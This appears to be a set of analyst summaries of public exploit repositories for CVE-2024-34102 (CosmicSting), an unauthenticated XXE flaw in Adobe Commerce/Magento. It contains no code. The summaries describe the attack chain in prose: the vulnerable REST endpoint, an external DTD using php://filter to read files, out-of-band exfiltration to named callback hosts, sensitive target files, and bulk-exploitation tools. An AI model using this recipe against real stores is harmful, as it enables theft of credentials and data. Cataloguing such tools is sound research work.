CosmicSting

Repository purpose: operational PoC exploit for CVE-2024-34102 ("CosmicSting") XXE in Adobe Commerce / Magento, enabling unauthenticated out-of-band file read and exfiltration. Structure (7 files): - exploit.py: main exploit CLI (Python). Generates an XXE payload that references an external DTD. Supports two DTD-hosting modes: (1) upload a generated DTD to https://fars.ee/ and use the returned .dtd URL; or (2) use an attacker-controlled DTD server via --dtd-server. The DTD uses php://filter/convert.base64-encode/resource=<file> to read arbitrary files and defines an entity that forces the target to request http(s)://<callback>/?exploited=<base64>. - server_dtd.py: attacker-side HTTP server on port 8000 that dynamically generates DTD content based on query parameters (callback, file, protocol). This avoids reliance on fars.ee and makes the exploit more reliable. - callback_server.py: attacker-side HTTP server on port 80 that receives exfiltration requests, extracts the 'exploited' query parameter, base64-decodes it, prints the recovered file content, and saves it to a timestamped text file. - README.md / QUICK_START.md: documentation, affected versions, usage examples, and suggested target files (e.g., /etc/passwd, Magento env.php, SSH keys, logs). - requirements.txt: requests and rich-click dependencies. Exploit capabilities: - Primary: arbitrary file read via OOB XXE with external DTD and HTTP(S) exfiltration. - Operational helpers: built-in DTD hosting server and callback receiver/decoder. Notable targeting detail: - The documented delivery endpoint is /rest/V1/guest-carts/1/estimate-shipping-methods (unauthenticated). The exploit expects the target to make outbound requests to fetch the DTD and to call back with exfiltrated data. Assessment: This is a real exploit (not just detection). It is operational (usable end-to-end) but not a full framework module; payload is parameterized mainly by file path and callback/DTT server settings.

This repository contains a Go-based exploit tool ('cosmic_sting.go') for CVE-2024-34102, a critical XXE vulnerability in Adobe Commerce (Magento) that allows remote code execution and arbitrary file read via a crafted XML payload. The tool automates the attack by generating a malicious DTD file (hosted on fars.ee), orchestrating the exfiltration of file contents from the target server, and decoding the results. It interacts with several external services (api.cvssadvisor.com for tracking/exfiltration, fars.ee for DTD hosting, and c5.rs for data exfiltration). The main exploit logic is in 'cosmic_sting.go', which is the only code file. The README provides usage instructions, including command-line flags for specifying the target URL and file to read. The exploit is operational and can be used to read arbitrary files from vulnerable Adobe Commerce installations accessible over the network.

This repository contains a proof-of-concept exploit for CVE-2024-34102, a critical XML entity injection vulnerability in Adobe Magento. The exploit is implemented in Python (PoC.py) and allows an attacker to exfiltrate arbitrary files from a vulnerable Magento instance by abusing the XML parser via a crafted JSON payload sent to a specific REST API endpoint. The attacker must provide the target Magento URL, the file path to exfiltrate, and an exfiltration server URL to receive the stolen data. The exploit works by referencing an external DTD hosted on the attacker's server, which in turn causes the target to read and base64-encode the specified file and send its contents to the attacker's exfiltration endpoint. The repository also includes a README.md with usage instructions and background information. No detection scripts or fake code are present; the exploit is a functional PoC for file exfiltration via XXE in Magento.

This repository is a proof-of-concept (POC) exploit for CVE-2024-34102, an unauthenticated XML External Entity (XXE) vulnerability in Magento. The exploit targets the /rest/V1/guest-carts/1/estimate-shipping-methods API endpoint, sending a crafted JSON payload that causes the server to process attacker-supplied XML. The included xxe.xml file demonstrates a typical XXE payload that attempts to read the /etc/passwd file from the server. The README provides a sample HTTP POST request, indicating that the exploit can be used to trigger HTTP requests to attacker-controlled webhooks, potentially exfiltrating sensitive data. The repository contains two files: a README with usage instructions and a sample XXE payload in XML format. No exploit framework is used; this is a standalone POC.

This repository provides a working exploit for CVE-2024-34102, an XXE vulnerability in Adobe Commerce (versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8, and earlier). The repository contains two main Python scripts: 'exploit.py' for targeting a single instance and 'massExploit.py' for batch exploitation against multiple targets. Both scripts craft a malicious XML payload that leverages an external DTD hosted on https://fars.ee/ to trigger the XXE vulnerability. The payload causes the target server to read and base64-encode the contents of /etc/passwd, then exfiltrate this data to an attacker-controlled endpoint (https://sabatnth.c5.rs/?exploited=...). The exploit targets the '/rest/V1/guest-carts/1/estimate-shipping-methods' endpoint of Adobe Commerce. The code uses the 'fake_useragent' library to randomize the User-Agent header and disables SSL verification. The repository is operational and can be used to confirm the presence of the vulnerability and exfiltrate sensitive files from affected servers.

This repository provides a proof-of-concept (POC) exploit for CVE-2024-34102, a critical XXE vulnerability in Adobe Commerce (Magento) versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8, and earlier. The main exploit logic is implemented in 'poc.py', a Python script that crafts and sends a malicious XML payload to the target's REST API endpoint, exploiting the XXE flaw to read arbitrary files (default: /etc/passwd) from the server. The exploit uses external services (fars.ee for DTD hosting and api.cvssadvisor.com for SSRF instance management and exfiltration) to facilitate the attack and confirm exploitation. Supporting Bash scripts ('check.bash', 'z_validate', 'z_compromise_check') automate checking multiple sites, validating patch status, and monitoring for compromise by tracking changes in loaded scripts. 'scripts.py' is a helper Python script for extracting script sources from target web pages. The repository is structured for both single-target and bulk/multi-site testing, with clear instructions in the README. No weaponized or framework-based automation is present; the code is a standalone POC with auxiliary scripts for detection and monitoring.

This repository contains a proof-of-concept (POC) exploit for CVE-2024-34102, a pre-authentication XML External Entity (XXE) vulnerability in Magento / Adobe Commerce. The repository consists of two files: a README.md with usage instructions and background, and cve-2024-34102.py, the main exploit script written in Python. The exploit works by: 1. Creating a malicious XML file (poc.xml) that, when processed by the vulnerable Magento endpoint, causes the target to read an arbitrary file (default: /etc/passwd) and exfiltrate its contents to the attacker's HTTP server. 2. Setting up a local HTTP server on the attacker's machine to receive the exfiltrated data. 3. Sending a crafted POST request to the Magento REST API endpoint (/rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods) with the XXE payload. 4. If the target is vulnerable, it will connect back to the attacker's server and send the contents of the specified file. The exploit requires the attacker to have a public IP and an open port for the HTTP server. The script is a functional POC and does not provide weaponized or automated post-exploitation capabilities. The main focus is on demonstrating the file read/exfiltration via XXE in Magento / Adobe Commerce.

This repository contains a Python exploit script (exploit.py) targeting CVE-2024-34102, a critical SSRF/XXE vulnerability in Adobe Commerce (versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8, and earlier). The exploit allows an attacker to read arbitrary files from the server by leveraging a crafted XML payload that references an external DTD hosted on fars.ee. The script automates the process of generating the malicious DTD, hosting it, obtaining a unique SSRF instance for tracking exfiltration, sending the exploit payload to the target's /rest/V1/guest-carts/1/estimate-shipping-methods endpoint, and retrieving the exfiltrated file contents via a callback to a controlled domain. The repository includes a README.md with detailed usage instructions and a requirements.txt listing dependencies (fake_useragent, requests, rich_click). The main entry point is exploit.py, which provides a command-line interface for specifying the target URL and file to read. The exploit is operational and automates the full attack chain, including cleanup of SSRF instances.

This repository contains a Go-based exploit tool ('cosmic_sting.go') for CVE-2024-34102, a critical XXE vulnerability in Adobe Commerce (versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier). The exploit automates the process of reading arbitrary files from a vulnerable server by leveraging a crafted XML DTD file, which is hosted on a remote service (fars.ee). The tool orchestrates the attack by generating a unique DTD, uploading it, and then sending a malicious request to the target's '/rest/V1/guest-carts/1/estimate-shipping-methods' endpoint. The XXE payload causes the server to fetch and exfiltrate the contents of a specified file (e.g., /etc/passwd) to an attacker-controlled endpoint (https://{instanceId}.c5.rs). The tool then retrieves and decodes the exfiltrated data via the cvssadvisor.com API. The repository consists of a single Go source file and a README with usage instructions. The exploit is operational, providing a working file read primitive against vulnerable Adobe Commerce installations.

This repository provides a proof-of-concept (PoC) exploit for CVE-2024-34102, an XXE (XML External Entity) vulnerability in Adobe Commerce (Magento) versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8, and earlier. The main exploit script, 'CVE-2024-34102.py', is a Python tool that automates the exploitation process. It allows the attacker to specify a target URL and a file path (defaulting to '/etc/hosts') to read from the server. The exploit works by sending a specially crafted XML payload to the target, which, if vulnerable, causes the server to fetch and exfiltrate the contents of the specified file to an attacker-controlled callback URL (blind XXE). The script includes logic for setting up the callback, sending the payload, and verifying exploitation. The repository also contains a README with usage instructions, example commands, and guidance for setting up a vulnerable test environment using Docker. The exploit is operational as a PoC, demonstrating file read and exfiltration via XXE, but does not include weaponized features such as arbitrary code execution or post-exploitation modules.

This repository provides an operational Python tool (cvehunter.py) for detecting and exploiting CVE-2024-34102, an unauthenticated XXE vulnerability in Adobe Magento. The tool is designed for both single-target and bulk exploitation, accepting either a single URL or a list of URLs. It uses asynchronous HTTP requests for performance and leverages an external SSRF/XXE callback service (api.cvssadvisor.com) to detect successful exploitation via out-of-band (OOB) interactions. The tool creates a callback instance, attempts exploitation, and checks for evidence of the attack in the callback service logs. The repository includes a README with usage instructions and a requirements.txt for dependencies. The main entry point is cvehunter.py, which contains all exploit logic. No hardcoded payloads are present; instead, the tool dynamically interacts with the callback service to confirm exploitation. The tool is suitable for security researchers and penetration testers targeting Magento instances for this specific vulnerability.

This repository provides a working exploit and detection script for CVE-2024-34102, a critical unauthenticated XXE vulnerability in Adobe Commerce and Magento. The exploit (exploit.py) allows an attacker to read arbitrary files from a vulnerable server by abusing the deserialization process and XXE in the Magento REST API. The attacker hosts a malicious DTD file and an OOB server to receive exfiltrated data. The exploit is operational and can be used to steal sensitive files such as app/etc/env.php, which may lead to admin access or further compromise. The repository includes two main Python scripts: 'exploit.py' (the main exploit) and 'detect.py' (for vulnerability detection). The exploit is not part of a framework and is self-contained, requiring the attacker to set up HTTP servers for DTD hosting and data exfiltration. The code is well-structured, with clear command-line options for specifying the target, file to read, and attacker-controlled servers. The README provides detailed usage instructions and context about the vulnerability and its impact.